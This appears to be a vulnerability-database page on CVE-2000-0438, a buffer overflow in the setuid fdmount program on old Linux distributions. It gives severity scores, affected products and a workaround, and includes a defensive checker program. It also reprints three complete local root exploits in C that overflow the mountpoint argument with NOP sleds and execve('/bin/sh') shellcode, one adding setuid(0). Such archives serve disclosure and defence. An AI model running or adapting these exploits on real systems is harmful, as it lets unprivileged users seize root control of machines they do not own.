CVE-2000-0438
CVSS 7.2
Published: 2000-05-22 00:00:00
Revised: 2008-09-10 15:04:41

[Original text] Buffer overflow in fdmount on Linux systems allows local users in the "floppy" group to execute arbitrary commands via a long mountpoint parameter.


[CNNVD] Multiple Linux vendor fdmount buffer overflow vulnerability (CNNVD-200005-079)

        A buffer overflow exists in fdmount on Linux systems. Local users in the "floppy" group can execute arbitrary commands as root by passing an overly long mountpoint parameter.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be taken down completely]
Access complexity: LOW [no special conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:caldera:openlinux:7.0
cpe:/o:slackware:slackware_linux:3.5
cpe:/o:turbolinux:turbolinux:6.0.1
cpe:/o:turbolinux:turbolinux:6.0
cpe:/o:slackware:slackware_linux:3.3
cpe:/o:suse:suse_linux:6.3
cpe:/o:slackware:slackware_linux:3.6
cpe:/o:suse:suse_linux:4.3
cpe:/o:suse:suse_linux:6.4
cpe:/o:suse:suse_linux:6.1
cpe:/o:turbolinux:turbolinux:6.0.2
cpe:/o:slackware:slackware_linux:3.4
cpe:/o:suse:suse_linux:6.2
cpe:/o:suse:suse_linux:4.4.1
cpe:/o:suse:suse_linux:7.0
cpe:/o:slackware:slackware_linux:4.0
cpe:/o:suse:suse_linux:6.0
cpe:/o:suse:suse_linux:4.4
cpe:/o:suse:suse_linux:5.3
cpe:/o:suse:suse_linux:5.1
cpe:/o:suse:suse_linux:4.2
cpe:/o:suse:suse_linux:5.0
cpe:/o:slackware:slackware_linux:3.9
cpe:/o:suse:suse_linux:5.2

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0438
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0438
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-079
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1239
(UNKNOWN)  BID  1239
http://archives.neohapsis.com/archives/bugtraq/2000-05/0245.html
(UNKNOWN)  BUGTRAQ  20000522 fdmount buffer overflow

- Vulnerability information

Multiple Linux vendor fdmount buffer overflow vulnerability
High severity   Buffer overflow
2000-05-22 00:00:00   2006-09-21 00:00:00
Local
        A buffer overflow exists in fdmount on Linux systems. Local users in the "floppy" group can execute arbitrary commands as root by passing an overly long mountpoint parameter.

- Advisories and patches

        MandrakeSoft has provided a source patch for this problem. It is expected that both MandrakeSoft and SuSE will release RPMs to fix this problem shortly.
        A suitable workaround is to remove the setuid bit from the fdmount binary, or to remove non-trusted users from the 'floppy' group.

- Vulnerability information (19952)

S.u.S.E. 4.x/5.x/6.x/7.0, Slackware 3.x/4.0, Turbolinux 6, OpenLinux 7.0 fdmount Buffer Overflow (1) (EDBID:19952)
linux local
2000-05-22 Verified
Author: Paulo Ribeiro
source: http://www.securityfocus.com/bid/1239/info

A buffer overflow exists in version 0.8 of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well-crafted buffer containing machine code in place of the mount point, users in the 'floppy' group can execute arbitrary commands as root.

This vulnerability exists in S.u.S.E. 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount setuid root, but users are not automatically added to the 'floppy' group. This list is by no means complete; other Linux distributions may be affected. To check whether you are affected, look for the setuid bit on the binary. If it is set, and the binary is executable by everyone or by group 'floppy', you are affected and should take action immediately.
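The check just described (setuid bit plus group or world execute permission) and the workaround from the advisories section above (strip the setuid bit, prune the 'floppy' group), as an added example that is not part of the original posting or of the fdutils package. The install path /usr/bin/fdmount is the one the exploits on this page use; the throwaway file used by the self-test, the TMPDIR fallback and the sample /etc/group line are assumptions for illustration. Root ownership is deliberately not checked, because the self-test cannot create root-owned files; when auditing a real install, also require st.st_uid == 0.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/stat.h>

enum exposure { NOT_INSTALLED, NOT_SETUID, SETUID_NOT_EXEC, AFFECTED };

/* The advisory's test: setuid bit set AND executable by group or by others.
 * Root ownership is not checked here (see the lead-in). */
enum exposure fdmount_exposure(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return NOT_INSTALLED;
    if (!(st.st_mode & S_ISUID))
        return NOT_SETUID;
    if (st.st_mode & (S_IXGRP | S_IXOTH))
        return AFFECTED;
    return SETUID_NOT_EXEC;
}

/* The advisory's workaround: strip only the setuid bit. fdmount then no longer
 * runs as root for anyone, so the overflow is no longer a privilege boundary. */
int fdmount_harden(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return chmod(path, (st.st_mode & 07777) & ~S_ISUID);
}

/* Split the member list of an /etc/group line ("floppy:x:19:alice,bob") into
 * names so the group can be audited; returns the number of members found. */
int group_line_members(const char *line, char names[][32], int max)
{
    const char *p = strrchr(line, ':');
    int n = 0;
    if (p == NULL)
        return 0;
    for (p++; *p != '\0' && *p != '\n' && n < max; n++) {
        size_t len = strcspn(p, ",\n");
        if (len >= 32)
            len = 31;
        memcpy(names[n], p, len);
        names[n][len] = '\0';
        p += strcspn(p, ",\n");
        if (*p == ',')
            p++;
    }
    return n;
}

/* Self-test on a throwaway file (assumption: TMPDIR or /tmp is writable and
 * honours chmod 4xxx). Returns 1 when every case matches the advisory's rule. */
int fdmount_selftest(void)
{
    const char *dir = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char tmpl[256];
    char names[4][32];
    int fd, ok = 1;

    snprintf(tmpl, sizeof tmpl, "%s/fdmount-check-XXXXXX", dir);
    if ((fd = mkstemp(tmpl)) < 0)
        return 0;
    close(fd);
    ok &= chmod(tmpl, 04755) == 0 && fdmount_exposure(tmpl) == AFFECTED;        /* world executable */
    ok &= chmod(tmpl, 04750) == 0 && fdmount_exposure(tmpl) == AFFECTED;        /* group 'floppy' only */
    ok &= chmod(tmpl, 04700) == 0 && fdmount_exposure(tmpl) == SETUID_NOT_EXEC; /* setuid but unusable by others */
    ok &= chmod(tmpl, 00755) == 0 && fdmount_exposure(tmpl) == NOT_SETUID;
    ok &= chmod(tmpl, 04755) == 0 && fdmount_harden(tmpl) == 0
          && fdmount_exposure(tmpl) == NOT_SETUID;                              /* workaround applied */
    unlink(tmpl);
    ok &= fdmount_exposure(tmpl) == NOT_INSTALLED;
    ok &= group_line_members("floppy:x:19:alice,bob\n", names, 4) == 2          /* constructed sample line */
          && strcmp(names[0], "alice") == 0 && strcmp(names[1], "bob") == 0;
    ok &= group_line_members("floppy:x:19:\n", names, 4) == 0;
    return ok;
}

int main(int argc, char **argv)
{
    static const char *verdict[] = {
        "not installed",
        "not setuid: not affected",
        "setuid but not group- or world-executable",
        "AFFECTED: setuid and executable by group or others"
    };
    const char *path = argc > 1 ? argv[1] : "/usr/bin/fdmount"; /* path used by the exploits on this page */
    struct group *g = getgrnam("floppy");

    printf("%s: %s\n", path, verdict[fdmount_exposure(path)]);
    if (g != NULL)
        for (char **m = g->gr_mem; *m != NULL; m++)
            printf("member of 'floppy': %s\n", *m);
    printf("self-test: %s\n", fdmount_selftest() ? "pass" : "fail");
    return 0;
}
```

Run it as any user to get the verdict for the installed binary plus the current 'floppy' membership; run fdmount_harden as root (or simply chmod u-s the binary) to apply the advisory's workaround.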

/*
 * fdmount 0.8 buffer-overflow exploit (fd-ex.c)
 * (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
 *
 * Systems tested: Slackware Linux 7.0
 *
 * Remember: you have to be a member of floppy group to exploit it!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             180
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

/* Aleph One's execve("/bin/sh") shellcode (32-bit x86) */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* 32-bit x86 only: the stack pointer is left in %eax, the return register */
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);   /* should stay a multiple of 4 */
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }

  /* RET: the mountpoint argument, filled with the guessed return address
   * (a stack address inside the EGG NOP sled) */
  addr = get_esp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* EGG: NOP sled followed by the shellcode, passed via the environment */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* write the variable names over the first 4 bytes of each payload */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/usr/bin/fdmount fd0 $RET");
  return 0;
}

/* fd-ex.c: EOF */
		

- Vulnerability information (19953)

S.u.S.E. 4.x/5.x/6.x/7.0, Slackware 3.x/4.0, Turbolinux 6, OpenLinux 7.0 fdmount Buffer Overflow (2) (EDBID:19953)
linux local
2000-05-22 Verified
Author: Scrippie
source: http://www.securityfocus.com/bid/1239/info
 

/*
   Welcome dear reader - be it scriptkiddy, whose sole intent it is to
   destroy precious old Unix boxes or Assembly Wizard whose sole intent it
   is to correct my code and send me a flame.

   The fdutils package contains a setuid root file that is used by the floppy
   group to mount and unmount floppies. If you are not in this group, this
   exploit will not work.

   This thingy was tested on Slackware 4.0 and 7.0

   Use as: fdmount-exp [offset] [buf size] [valid text ptr]

   Since the char * text is overwritten in void errmsg(char *text) we should
   make sure that this points to a valid address (something in the .data
   section should do perfectly). The hard coded one used works on my box,
   to find the one you need use something like:

   objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
   cut -d " " -f1

   The HUGE number of nops is needed to make sure this exploit works.
   Since it Segfaults out of existence without removing /etc/mtab~ we
   only get one try...

   Take care with your newly acquired EUID 0!

   Cheers go out to: #phreak.nl #b0f #hit2000 #root66
   The year 2000 scriptkiddie award goes to: Gerrie Mansur
   Love goes out to: Hester, Maja (you're so cute!), Dopey

   -- Yours truly,
                Scrippie - ronald@grafix.nl - buffer0verfl0w security
                                            - #phreak.nl
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NUM_NOPS 500

/* Gee, Aleph1 his shellcode is back once more:
 * a setuid(0) call followed by the execve("/bin/sh") shellcode (32-bit x86) */
char shellcode[] =
   "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* 32-bit x86 only: the stack pointer is left in %eax, the return register */
unsigned long get_sp(void) {
   __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
   int buf_size = 71;           /* bytes before the saved return address */
   int offset = 0, i;

   char *overflow;
   char *ovoff;
   long addr, ptr = 0x0804c7d0; /* some readable address in fdmount's .data */

   if(argc>1) offset = atoi(argv[1]);
   if(argc>2) buf_size = atoi(argv[2]);
   if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);

   printf("##############################################\n");
   printf("# fdmount Slack 4/7 exploit  -  by Scrippie  #\n");
   printf("##############################################\n");
   printf("Using offset: %d\n", offset);
   printf("Using buffer size: %d\n", buf_size);
   printf("Using 0x%lx for \"void errmsg(char *text,...)\" char *text\n", ptr);

   /* calloc: the buffer must be zero-filled because the strlen() calls
    * below are used to find the current end of the payload */
   if(!(overflow = (char *)calloc(buf_size+16+NUM_NOPS+strlen(shellcode)+1, 1))) {
      fprintf(stderr, "Outta memory - barging out\n");
      exit(-1);
   }

   overflow[0] = '/';           /* the mountpoint must look like an absolute path */

   for(i=1;i<buf_size;i++) {
      overflow[i] = 0x90;
   }

   addr = get_sp() - offset;

   printf("Resulting address: 0x%lx\n", addr);

   /* new return address, then three copies of a valid pointer so that the
    * overwritten char *text argument of errmsg() still dereferences safely */
   memcpy(overflow + strlen(overflow), (void *) &addr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
   memcpy(overflow + strlen(overflow), (void *) &ptr, 4);

   ovoff = overflow + strlen(overflow);

   for(i=0;i<NUM_NOPS;i++) {
      *ovoff++ = 0x90;           /* NOP sled above the frame, landed on by addr */
   }

   strcpy(ovoff, shellcode);

   execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, (char *) NULL);

   return 0;
}
/*                    www.hack.co.za           [18 May]*/
		

- Vulnerability information (19954)

S.u.S.E. 4.x/5.x/6.x/7.0, Slackware 3.x/4.0, Turbolinux 6, OpenLinux 7.0 fdmount Buffer Overflow (3) (EDBID:19954)
linux local
2000-05-22 Verified
Author: WaR
source: http://www.securityfocus.com/bid/1239/info
  

/* fdmount exploit
 *
 * by [WaR] <war@genhex.org> and Zav <zav@genhex.org>
 *
 * usage: ./fdmountx <offset>
 *   try with offset around 390 (you'll only get one try)
 *
 *  Shout outs to all of the GenHex crew, and to
 *            the #newbreed at irc.ptnet.org.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 70

/* execve("/bin/sh") shellcode, 32-bit x86 */
char shell[] = /* by Zav */
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";


int main(int argc, char **argv)
{
  char buffer[BUFFSIZE+6];
  /* a stack address in this process, used as the guess for the victim's
   * frame and shifted by the offset argument (assumes 32-bit, 4-byte long) */
  unsigned long eip=(unsigned long)&eip;
  unsigned long *ptr;


  if(argc>1)
   eip+=atoi(argv[1]);

  memset(buffer,0x90,75);                                   /* NOP sled */
  memcpy(buffer+(BUFFSIZE-strlen(shell)),shell,strlen(shell)); /* shellcode ends at byte 69 */

 ptr=(unsigned long*)(buffer+71);                            /* saved return address lives at offset 71 */
 *ptr=eip;

 buffer[75]=0;
 buffer[0]='/';                                              /* mountpoint must be an absolute path */

 execl("/usr/bin/fdmount","fdmount","fd0",buffer,(char *)NULL);
 return 0;
}

		

- Vulnerability information

1347
Multiple Linux Vendor fdmount Buffer Overflow
Local Access Required   Input Manipulation
Loss of Integrity   Patch / RCS
Exploit Public   Third-party Verified

- Vulnerability description

- Timeline

2000-05-22 (disclosure date); other timeline dates unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, patches have been released by multiple Linux distributions, as well as by a poster responding to the original disclosure. (The BugTraq posting quoted above does describe a workaround: remove the setuid bit from the fdmount binary, or remove untrusted users from the 'floppy' group.)

- References

- Vulnerability author

Unknown or Incomplete
 

 
